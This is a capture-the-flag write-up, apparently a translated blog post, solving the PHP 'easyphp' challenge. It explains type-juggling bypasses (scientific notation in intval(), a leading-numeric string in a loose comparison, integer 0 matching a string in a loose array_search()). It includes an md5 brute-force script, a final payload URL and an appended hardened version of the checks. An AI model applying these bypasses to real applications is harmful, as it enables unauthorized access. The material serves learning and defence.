【Attack and Defense World】easyphp

Without much preamble: opening the environment shows a long block of PHP code, which is still hard for a novice like me. I could only work out the idea for constructing the payload bit by bit, and of course I also referred to other people's write-ups online. Writing it down deepens my impression, and I can look it up later, learning the new by reviewing the old.

<?php
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;

$a = $_GET['a'];
$b = $_GET['b'];

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

if($key1 && $key2){
    include "Hgfks.php";
    echo "You're right"."\n";
    echo $flag;
}

?>

(Opening the page without any parameters also prints the first die() message: Emmm...)

Look at the last block: when key1 and key2 are both 1, the flag is returned. key1 and key2 are set to 1 only when the three parameters a, b and c all meet their conditions.

Analyzing it section by section, first come the requirements on the two parameters a and b.

if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){
    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){
        $key1 = 1;
        }else{
            die("Emmm...再想想");
        }
    }else{
    die("Emmm...");
}

The value of a must be greater than 6000000 but no longer than 3 characters. It is easy to think of scientific notation, such as 1e8 or 1e9: strlen("1e9") is 3, while intval("1e9") evaluates to 1000000000.

The last 6 characters of the md5 hash of b must be "8b184b". There seems to be no better way than writing a script to brute-force this; it finds b = 53724.

import hashlib

def find_b(limit=100000, suffix="8b184b"):
    # Try the decimal strings "0", "1", ... and return the first whose
    # md5 hex digest ends with the required suffix.
    for i in range(limit):
        m = hashlib.md5(str(i).encode()).hexdigest()
        if m[-6:] == suffix:
            return i, m
    return None

print(find_b())  # the write-up reports b = 53724

Then look at c:

$c=(array)json_decode(@$_GET['c']);
if(is_array($c) && !is_numeric(@$c["m"]) && $c["m"] > 2022){
    if(is_array(@$c["n"]) && count($c["n"]) == 2 && is_array($c["n"][0])){
        $d = array_search("DGGJ", $c["n"]);
        $d === false?die("no..."):NULL;
        foreach($c["n"] as $key=>$val){
            $val==="DGGJ"?die("no......"):NULL;
        }
        $key2 = 1;
    }else{
        die("no hack");
    }
}else{
    die("no");
}

c is a parameter in JSON format; the value of its m key must not be numeric, yet must be greater than 2022.

is_numeric() checks whether a value is numeric in PHP, either a number or a numeric string; "2222a" evaluates to false.
When "2222a" is compared with 2022, PHP converts the string to a number first, so it behaves like comparing 2222 with 2022; a string such as "a2222", with no leading digits, is converted to 0.
Therefore the value of the m key can be "2333abc", which satisfies both conditions at once.

The value of the n key must be an array with exactly 2 elements whose first element is itself an array, i.e. [[...], ...].

Looking further down: if no DGGJ is found in the value of the n key, array_search() returns false and the script dies; but the loop right after it also dies if it finds DGGJ while traversing the array...

array_search() works like in_array(): it searches the array for a value and returns the key of the first matching element, or false if nothing matches. By default it uses loose comparison (==), so it effectively compares each element with "DGGJ" using ==. When PHP compares a number with a string loosely, it first tries to convert the string to an integer or float and then compares; a non-numeric string like "DGGJ" becomes 0. So if the n array contains the integer 0, that element is loosely equal to "DGGJ", array_search() finds it and returns its key instead of false. The foreach loop, on the other hand, uses strict comparison (===), and no element is literally the string "DGGJ", so it never dies.

So you can construct c as {"m":"2333abc","n":[[0,1],0]}

To sum up

Construct the payload:

http://ip:port/?a=1e9&b=53724&c={"m":"2333abc","n":[[0,1],0]}
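The following is an added example, not code from the original write-up or from the challenge. It replays the three checks discussed above (the intval/strlen check on a, the is_numeric/greater-than check on m, and the loose array_search() on n) against the payload values from this post, and beside them a hardened variant (my own assumption of what a defender would write) that validates types before comparing and searches strictly. Everything described above relies on PHP 7 type juggling: under PHP 8, 0 == "DGGJ" is false, so even the challenge's own check rejects this payload.

```php
<?php
// Added example (not from the original write-up). Run with PHP 7.x to
// reproduce the loose-comparison results described in the post.
declare(strict_types=1);

// Payload values from the write-up.
$a = '1e9';
$b = '53724';
$cJson = '{"m":"2333abc","n":[[0,1],0]}';

// The challenge's checks, condensed into a function that returns the
// reason for rejection, or "ok" when both key1 and key2 would be set.
function challenge_checks(string $a, string $b, string $cJson): string
{
    // intval("1e9") is 1000000000 while strlen("1e9") is 3.
    if (!(intval($a) > 6000000 && strlen($a) <= 3)) {
        return 'a rejected';
    }
    if ('8b184b' !== substr(md5($b), -6, 6)) {
        return 'b rejected';
    }
    $c = (array) json_decode($cJson);
    // "2333abc" is not numeric, but loosely compares as 2333 > 2022.
    if (!(is_array($c) && !is_numeric(@$c['m']) && $c['m'] > 2022)) {
        return 'c.m rejected';
    }
    if (!(is_array(@$c['n']) && count($c['n']) == 2 && is_array($c['n'][0]))) {
        return 'c.n shape rejected';
    }
    // Loose search: in PHP 7, 0 == "DGGJ" is true, so the element 0 matches.
    if (array_search('DGGJ', $c['n']) === false) {
        return 'DGGJ not found';
    }
    foreach ($c['n'] as $val) {
        if ($val === 'DGGJ') {   // strict: never true for this payload
            return 'DGGJ present';
        }
    }
    return 'ok';
}

// Hardened variant (assumption, not part of the challenge): reject anything
// that is not the exact type expected before doing any comparison.
function hardened_checks(string $a, string $b, string $cJson): string
{
    // Only a plain decimal integer string is accepted, so "1e9" fails here.
    if (!preg_match('/^\d+$/', $a) || (int) $a <= 6000000 || strlen($a) > 3) {
        return 'a rejected';
    }
    if (!hash_equals('8b184b', substr(md5($b), -6, 6))) {
        return 'b rejected';
    }
    $c = json_decode($cJson, true);   // plain arrays, not stdClass
    // m must be an actual integer; a JSON string like "2333abc" is rejected.
    if (!is_array($c) || !isset($c['m']) || !is_int($c['m']) || $c['m'] <= 2022) {
        return 'c.m rejected';
    }
    if (!isset($c['n']) || !is_array($c['n']) || count($c['n']) !== 2 || !is_array($c['n'][0])) {
        return 'c.n shape rejected';
    }
    // strict = true: only the string "DGGJ" itself matches, so the integer 0
    // no longer stands in for it.
    if (!in_array('DGGJ', $c['n'], true)) {
        return 'DGGJ not found';
    }
    return 'ok';
}

echo 'challenge : ' . challenge_checks($a, $b, $cJson) . PHP_EOL; // PHP 7: ok
echo 'hardened  : ' . hardened_checks($a, $b, $cJson) . PHP_EOL;  // a rejected
```

Each bypass in the payload maps to one loose check: scientific notation through intval(), a leading-numeric string through a loose greater-than, and the integer 0 through array_search() without its strict flag. Passing `true` as the third argument to in_array()/array_search(), and checking is_int() before a numeric comparison, removes all three.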


Origin blog.csdn.net/m0_51683653/article/details/128839648